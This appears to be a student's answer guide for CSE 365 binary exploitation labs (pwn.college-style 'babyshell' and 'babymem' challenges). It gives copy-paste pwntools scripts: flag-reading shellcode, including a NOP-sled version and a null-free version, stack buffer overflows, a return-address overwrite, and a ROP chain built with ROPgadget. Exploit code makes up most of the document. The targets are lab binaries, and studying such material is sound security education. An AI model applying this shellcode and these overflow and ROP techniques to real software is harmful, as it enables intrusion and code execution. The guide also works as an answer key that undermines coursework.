CSE 365 - Binary Exploitation

Shellcode Injection: level 1)

Run the following python script make sure the indentations are just as they appear
below in case copy pasting throws it off

import pwn
pwn.context.arch='AMD64'
chall = "/challenge/babyshell_level1"
r = pwn.process(chall)
payload=pwn.asm(f"""

mov rax, 2
mov rsi, 0
mov rdx, 0
lea rdi, [rip + flagtext]
syscall

mov rdi, rax

mov rax, 0
mov rsi, rsp
mov rdx, 1000
syscall

mov rax, 1
mov rdi, 1
syscall

mov rax, 60
mov rdi, 0
syscall

flagtext:
.ascii "/flag"

""")

r.send(payload)
r.interactive()

CSE 365 - Binary Exploitation 1

 Shellcode Injection: level 2)
Run the following python script make sure the indentations are just as they appear
below in case copy pasting throws it off

import pwn
pwn.context.arch='AMD64'
chall = "/challenge/babyshell_level2"
r = pwn.process(chall)
payload=pwn.asm(f"""

.rept 800
nop
.endr

mov rax, 2
mov rsi, 0
mov rdx, 0
lea rdi, [rip + flagtext]
syscall

mov rdi, rax

mov rax, 0
mov rsi, rsp
mov rdx, 1000
syscall

mov rax, 1
mov rdi, 1
syscall

mov rax, 60
mov rdi, 0
syscall

flagtext:
.ascii "/flag"

""")

r.send(payload)
r.interactive()

CSE 365 - Binary Exploitation 2

 Shellcode Injection: level 3)
Run the following python script make sure the indentations are just as they appear
below in case copy pasting throws it off

#!/usr/bin/env python
import re
import pwn

pwn.context.update(arch="amd64")

asm = pwn.asm("""
xor rsi, rsi
xor rdx, rdx

mov rax, 0x101010101010101

push rax
mov rax, 0x101010101010101 ^ 0x67616c662f
xor [rsp], rax
mov rdi, rsp
xor rax, rax
mov al, 2
syscall

mov rdi, rax

xor rax, rax
mov rsi, rsp
mov dl, 128
syscall

mov al, 1
mov dil, 1
syscall

mov al, 60
xor dil, dil
syscall
""")
with pwn.process("/challenge/babyshell_level3") as process:
process.write(asm)
result = process.readallS()
print(result)

Memory Errors: level 1.0)

CSE 365 - Binary Exploitation 3

 1. Run the challenge using

/challenge/babymem_level1.0

2. Look for the size of your buffer and enter in one more than it since we are trying to
overflow the buffer

CSE 365 - Binary Exploitation 4

 3. Use the following website to enter that number of characters (1 more than size of
buffer) and press enter

CSE 365 - Binary Exploitation 5

 Character Counter - WordCounter.net
Character Count is a free online tool that calculates the number of
characters and words written in your writing.

https://wordcounter.net/character-count

Memory Errors: level 1.1)

1. Run the challenge using

/challenge/babymem_level1.1

2. Enter in 200 for the payload size

3. Enter in 200 characters for the payload

Memory Errors: level 2.0)

1. Run the challenge using

/challenge/babymem_level2.0

2. In the following python script make sure the indentations are just as they appear
below in case copy pasting throws it off you will also have to edit something on each
line where there is a comment

CSE 365 - Binary Exploitation 6

 from pwn import *

p = process('/challenge/babymem_level2.0')

payload = b'A' * # Use bytes to reach the win variable

payload += p32() # Set the win variable to the desired value

p.sendline(b'') # Send a total of bytes

p.sendline(payload)

print(p.recvall().decode())

3. Run the python script in a split terminal and copy the following values into your
python script. Here is a screenshot

CSE 365 - Binary Exploitation 7

 Memory Errors: level 2.1)
coming soon

Memory Errors: level 3.0)

1. Run the challenge using

gdb /challenge/babymem_level3.0

2. Once in gdb press enter and run

3. Then press Control + c

4. Then type info functions win

5. From here you can copy and paste all the values you will need into the following
python script and run it

#!/bin/python
import pwn
import os

directory = os.listdir("/challenge")[0]

pwn.context.arch = "amd64"

program = pwn.process(f"/challenge/{directory}")

buffer_size = #enter buffer size here

padding = #enter padding here
return_address_size = 8
win_function_address = pwn.p64() # enter address from gdb

payload_size = buffer_size + padding + return_address_size

# Create the payload

payload = b'a' * (payload_size - len(win_function_address)) + win_function_address

# Pass the payload to the process

program.write(f"{payload_size}\n{payload.decode('latin-1')}")
print(program.readallS())

CSE 365 - Binary Exploitation 8

 6. Run the python file in a split terminal, here is a screenshot if you are confused

Memory Errors: level 3.1)

coming soon

Memory Errors: level 6.0)

1. Run the challenge using

CSE 365 - Binary Exploitation 9

 gdb /challenge/babymem_level6.0

2. Once in gdb press enter and run

3. Then press Control + c

4. Then type info functions win_authed

5. In a split terminal run the following commands one by one

ROPgadget --binary /challenge/babymem_level6.0 > gadgets.txt

grep -E "pop rdi ; ret" gadgets.txt

6. From here you can copy and paste all the values you will need into the following
python script and run it

#!/bin/python
import pwn
import os

directory = os.listdir("/challenge")[0]

pwn.context.arch = "amd64"

program = pwn.process(f"/challenge/{directory}")

# payload_size = buffer_size + padding + return_address_size

buffer_size = #enter your value here
padding = #enter your value here
pop_rdi_ret_address = pwn.p64() #enter your value here
win_authed_address = pwn.p64() #enter your value here

payload = b"A" * buffer_size # Fill the buffer

payload += b"B" * padding # Fill other stuff between the buffer and the return address
payload += pop_rdi_ret_address # Address of the pop rdi ; ret gadget
payload += pwn.p64(0x1337) # Value of 0x1337 for the RDI register (win_authed argument)
payload += win_authed_address # Overwrite the return address with win_authed() address

payload_size = len(payload)

# Pass the payload to the process

program.write(f"{payload_size}\n{payload.decode('latin-1')}")
print(program.readallS())

CSE 365 - Binary Exploitation 10

 7. Run the python file in a split terminal, here is a screenshot if you are confused

CSE 365 - Binary Exploitation 11